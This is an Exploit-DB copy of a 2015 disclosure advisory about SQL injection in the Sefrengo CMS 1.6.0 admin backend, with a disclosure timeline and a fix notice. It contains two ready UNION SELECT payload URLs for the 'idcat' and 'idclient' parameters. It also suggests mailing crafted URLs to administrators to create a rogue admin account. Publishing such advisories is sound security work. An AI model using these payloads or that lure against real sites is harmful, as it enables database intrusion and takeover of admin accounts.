Sefrengo CMS 1.6.0 - SQL Injection

EDB-ID:

35722

CVE:

2015-0919

EDB Verified:

Author:

Steffen Rösemann

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2015-01-07

Vulnerable App: 
Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0
Advisory ID: SROEADV-2015-04
Author: Steffen Rösemann
Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014)
Vendor URL: http://www.sefrengo.org/start/start.html
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

The Content Management System Sefrengo v.1.6.0 contains SQL-Injection
vulnerabilities in its administrative Backend.

==================
Technical Details:
==================

The administrative Backend of Sefrengo CMS contains a functionality to edit
folders which reside on the CMS. Its located here:

http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0

The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker
could abuse this to send crafted URLs to the administrator via mail to
execute own SQL commands (e.g. create a second admin-account).

Exploit-Example:

http://
{TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0

Another SQL-Injection vulnerability can be found in the administrative
backend, where the admin can manage installed plugins. The vulnerable
parameter is „idclient“ in the following URL:

http://{TARGET}/backend/main.php?area=plug&idclient=1

Exploit-Example:

http://
{TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+

=========
Solution:
=========

Update to the latest version

====================
Disclosure Timeline:
====================
21-Dec-2014 –found the vulnerability
21-Dec-2014 - informed the developers
22-Dec-2014 - response by vendor
04-Jan-2015 – fix by vendor
04-Jan-2015 - release date of this security advisory
04-Jan-2015 - post on BugTraq / FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

http://www.sefrengo.org/start/start.html
http://sroesemann.blogspot.de
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services